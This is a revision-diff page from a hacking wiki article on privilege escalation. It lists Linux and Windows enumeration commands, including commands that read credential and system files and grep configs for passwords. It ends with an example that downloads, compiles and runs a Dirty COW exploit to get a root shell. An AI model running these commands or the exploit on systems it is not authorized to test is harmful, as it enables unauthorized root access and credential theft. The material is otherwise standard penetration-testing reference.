Privilege Escalation: Difference between revisions

From HackOps
Jump to navigation Jump to search
← Older editNewer edit →
VisualWikitext
Line 130: Line 130:
| Printer services || <code>lpstat -a # Lists printers and their status</code>
| Printer services || <code>lpstat -a # Lists printers and their status</code>
|| May indicate running printer daemons or services with elevated privileges that can be misused or are misconfigured.
|| May indicate running printer daemons or services with elevated privileges that can be misused or are misconfigured.
|-
| Running services & privileges || <code>ps aux # Lists all running processes with associated users</code>
<code>ps -ef # Alternative view of all processes with full format</code><br>
<code>top # Dynamic real-time process list</code><br>
<code>cat /etc/services # Maps known services to their ports</code>
|| Helps identify active services and their privilege levels, which may include insecure or unnecessary daemons.
|-
| Root-owned services || <code>ps aux | grep root # Filters running processes owned by root</code>
<code>ps -ef | grep root # Alternate full-format view of root-owned processes</code>
|| Useful for spotting services running as root that may be vulnerable or misconfigured — valuable targets for privilege escalation.
|-
| Installed applications & versions || <code>ls -alh /usr/bin/ # Lists applications and binaries in user path</code>
<code>ls -alh /sbin/ # Lists system binaries</code><br>
<code>dpkg -l # Lists installed packages (Debian-based systems)</code>
<code>rpm -qa # Lists installed packages (RPM-based systems)</code>
<code>ls -alh /var/cache/apt/archives # Shows downloaded .deb packages</code>
<code>ls -alh /var/cache/yum/ # Shows cached .rpm packages</code>
|| Reveals software presence and versions — helpful for identifying vulnerable or exploitable programs that may be running.
|-
| Service config files || <code>cat /etc/syslog.conf # Syslog daemon configuration
cat /etc/chttp.conf # Tiny HTTP server config
cat /etc/lighttpd.conf # Lighttpd server config
cat /etc/cups/cupsd.conf # Printing service config
cat /etc/inetd.conf # Legacy super-server config
cat /etc/apache2/apache2.conf # Apache main config (Debian-based)
cat /etc/my.conf # MySQL config file
cat /etc/httpd/conf/httpd.conf # Apache main config (RHEL-based)
cat /opt/lampp/etc/httpd.conf # XAMPP's Apache config
ls -aRl /etc/ | awk '$1 ~ /^.*r.*/' # Lists readable files under /etc/ (potential misconfigurations)</code>
|| Checking these can reveal misconfigured services, overly permissive settings, or vulnerable modules that open attack vectors.
|-
| Scheduled jobs || <code>crontab -l # List current user's cron jobs
ls -alh /var/spool/cron # View cron job files for users
ls -al /etc/ | grep cron # Search for cron-related files
ls -al /etc/cron* # List contents of cron directories
cat /etc/cron* # Print content of all cron config files
cat /etc/at.allow # Users allowed to use 'at'
cat /etc/at.deny # Users denied from using 'at'
cat /etc/cron.allow # Users allowed to use cron
cat /etc/cron.deny # Users denied from using cron
cat /etc/crontab # System-wide cron job definitions
cat /etc/anacrontab # anacron job scheduler config
cat /var/spool/cron/crontabs/root # Root's scheduled cron jobs</code>
|| Scheduled jobs may reveal tasks running as root, outdated scripts, or writable paths exploitable for privilege escalation.
|-
| Plaintext credentials || <code>grep -i user [filename] # Search for 'user' (case-insensitive)
grep -i pass [filename] # Search for 'pass' (case-insensitive)
grep -C 5 "password" [filename] # Show context around 'password'
find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password" # Look for hardcoded credentials in PHP files (e.g., Joomla)</code>
|| These patterns help uncover stored plaintext usernames or passwords in misconfigured or insecure code and config files.


|}
|}

Revision as of 18:32, 30 May 2025

Privilege Escalation

Privilege escalation is the process of gaining higher-level permissions or access within a system after an initial foothold has been established. It plays a critical role in post-exploitation, allowing an attacker to move from a limited user account to administrative or root-level access — often enabling lateral movement, persistence, or full system compromise.

Privilege escalation is typically divided into two categories: *vertical escalation* (gaining higher privileges) and *horizontal escalation* (gaining access to resources or accounts of equal privilege).

Privilege escalation is rarely a one-step action — it follows a structured process:

  • Collect – Perform thorough enumeration across the system.
  • Process – Organize and analyze the data to identify promising leads.
  • Search – Identify known vulnerabilities and locate suitable exploit code.
  • Adapt – Customize the exploit to match the specific environment.
  • Try – Execute and iterate; exploitation often requires trial and error.


Operational Context

Privilege escalation typically follows successful Initial Access, especially when the initial compromise grants access only to limited user accounts.

This phase is crucial for:

  • Achieving administrative control (root, SYSTEM)
  • Enabling credential extraction and lateral movement
  • Bypassing sandboxed or containerized environments
  • Establishing persistence mechanisms (e.g., registry, startup tasks)

Vertical Privilege Escalation

Vertical escalation involves moving from a low-privileged account (e.g., www-data, local user) to a higher-privileged one (e.g., Administrator, SYSTEM, or root).

Common Techniques

  • Exploiting kernel or driver vulnerabilities
  • Abusing misconfigured SUID/SGID binaries (Linux)
  • Misusing weak or world-writable service files
  • Leveraging unquoted service paths (Windows)
  • DLL hijacking or service misconfiguration
  • Stealing credentials from memory or config files
  • Abusing scheduled tasks or cron jobs
  • Exploiting insecure file permissions or ownership
  • Leveraging token impersonation or privilege tokens (Windows)
  • Dumping and cracking password hashes
  • Abusing Linux capabilities (e.g., cap_sys_admin)
  • Escaping weakly isolated Docker or LXC containers
  • Exploiting insecure ACLs or lack of integrity controls

Tools

Automated Exploitation Frameworks

Horizontal Privilege Escalation

Horizontal escalation involves accessing other accounts, sessions, or resources at the same privilege level, typically through impersonation, session hijacking, or misconfigured file access.

Common Techniques

  • Reading other users’ sensitive files due to improper permissions
  • Accessing SSH keys, config files, or tokens
  • Hijacking user sessions (e.g., TTY snooping or credential reuse)
  • Exploiting insecure file-sharing configurations (e.g., SMB shares)
  • Abuse of API tokens or database credentials found in cleartext

Tools

Enumeration Checklists

Linux Enumeration Commands

Purpose Command Potential Use in Privilege Escalation
SUID/SGID binaries find / -perm -4000 2>/dev/null May reveal misconfigured binaries that can be exploited for privilege escalation.
Kernel version uname -a Identifying vulnerable kernel versions that have known local privilege escalation exploits.
Environment variables env May expose sensitive paths or misconfigured variables usable in custom script execution.
Running processes ps aux Reveals running services or scripts running as root; useful for process injection or misconfigurations.
Installed packages (Debian) dpkg -l Can identify vulnerable software versions or unintended package installs.
Installed packages (Red Hat) rpm -qa Same as above, but for RPM-based systems.
Writable directories find / -writable 2>/dev/null Writable locations may allow backdoor placement, script replacement, or abuse in cron jobs.
Cron jobs cat /etc/crontab Look for jobs running as root or referencing writable scripts.
User info cat /etc/passwd Useful for identifying users, shell access, and potential privilege chaining.
Group info cat /etc/group Can show membership in sensitive groups like `sudo`, `docker`, or `adm`.
OS version info (Generic) cat /etc/issue Helps fingerprint system for targeted exploits.
OS version info (All common release files) cat /etc/*-release Same purpose — confirms distro and version for exploit matching.
OS version (Debian based) cat /etc/lsb-release Specifically useful for identifying Ubuntu/Debian versions.
OS version (Red Hat based) cat /etc/redhat-release Same, but for RHEL/CentOS systems.
Kernel version & architecture cat /proc/version # Shows detailed kernel version and build info

uname -a # Displays all system info including kernel name and architecture
uname -mrs # Prints kernel name, version, and hardware name
rpm -q kernel # Lists installed kernel packages (RPM-based systems)
dmesg | grep Linux # Extracts kernel-related boot messages
ls /boot | grep vmlinuz- # Lists available kernel images in /boot

Used to identify kernel-specific vulnerabilities and tailor exploits to system architecture.
Environment configuration files cat /etc/profile # System-wide environment variables

cat /etc/bashrc # System-wide bash shell settings
cat ~/.bash_profile # User-specific environment variables
cat ~/.bashrc # User-specific bash shell settings
cat ~/.bash_logout # Commands run at logout
env # Print current environment variables

Can reveal exposed credentials, custom paths, or insecure settings that can be leveraged for privilege escalation.
Printer services lpstat -a # Lists printers and their status May indicate running printer daemons or services with elevated privileges that can be misused or are misconfigured.
Running services & privileges ps aux # Lists all running processes with associated users

ps -ef # Alternative view of all processes with full format
top # Dynamic real-time process list
cat /etc/services # Maps known services to their ports

Helps identify active services and their privilege levels, which may include insecure or unnecessary daemons.
Root-owned services grep root # Filters running processes owned by root

ps -ef | grep root # Alternate full-format view of root-owned processes

Useful for spotting services running as root that may be vulnerable or misconfigured — valuable targets for privilege escalation.
Installed applications & versions ls -alh /usr/bin/ # Lists applications and binaries in user path

ls -alh /sbin/ # Lists system binaries
dpkg -l # Lists installed packages (Debian-based systems) rpm -qa # Lists installed packages (RPM-based systems) ls -alh /var/cache/apt/archives # Shows downloaded .deb packages ls -alh /var/cache/yum/ # Shows cached .rpm packages

Reveals software presence and versions — helpful for identifying vulnerable or exploitable programs that may be running.
Service config files cat /etc/syslog.conf # Syslog daemon configuration

cat /etc/chttp.conf # Tiny HTTP server config cat /etc/lighttpd.conf # Lighttpd server config cat /etc/cups/cupsd.conf # Printing service config cat /etc/inetd.conf # Legacy super-server config cat /etc/apache2/apache2.conf # Apache main config (Debian-based) cat /etc/my.conf # MySQL config file cat /etc/httpd/conf/httpd.conf # Apache main config (RHEL-based) cat /opt/lampp/etc/httpd.conf # XAMPP's Apache config ls -aRl /etc/ | awk '$1 ~ /^.*r.*/' # Lists readable files under /etc/ (potential misconfigurations)

Checking these can reveal misconfigured services, overly permissive settings, or vulnerable modules that open attack vectors.
Scheduled jobs crontab -l # List current user's cron jobs

ls -alh /var/spool/cron # View cron job files for users ls -al /etc/ | grep cron # Search for cron-related files ls -al /etc/cron* # List contents of cron directories cat /etc/cron* # Print content of all cron config files cat /etc/at.allow # Users allowed to use 'at' cat /etc/at.deny # Users denied from using 'at' cat /etc/cron.allow # Users allowed to use cron cat /etc/cron.deny # Users denied from using cron cat /etc/crontab # System-wide cron job definitions cat /etc/anacrontab # anacron job scheduler config cat /var/spool/cron/crontabs/root # Root's scheduled cron jobs

Scheduled jobs may reveal tasks running as root, outdated scripts, or writable paths exploitable for privilege escalation.
Plaintext credentials grep -i user [filename] # Search for 'user' (case-insensitive)

grep -i pass [filename] # Search for 'pass' (case-insensitive) grep -C 5 "password" [filename] # Show context around 'password' find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password" # Look for hardcoded credentials in PHP files (e.g., Joomla)

These patterns help uncover stored plaintext usernames or passwords in misconfigured or insecure code and config files.

Windows Enumeration Commands

Purpose Command
Whoami and privileges whoami /priv
Local groups net localgroup administrators
Services (CMD) sc query
Services (PowerShell) Get-Service
Startup registry keys reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
Scheduled tasks schtasks /query
Installed programs wmic product get name
Environment variables set
File permissions (CMD) icacls
File permissions (Sysinternals) accesschk

Example: Local Kernel Exploit (Linux)

# Download and compile local privilege escalation exploit (example: Dirty Cow variant)
wget https://www.exploit-db.com/download/40839 -O exploit.c
gcc exploit.c -o exploit
./exploit

# Output: spawns root shell if successful

Websites & References

See Also

Retrieved from "https://hackops.wiki/index.php?title=Privilege_Escalation&oldid=159"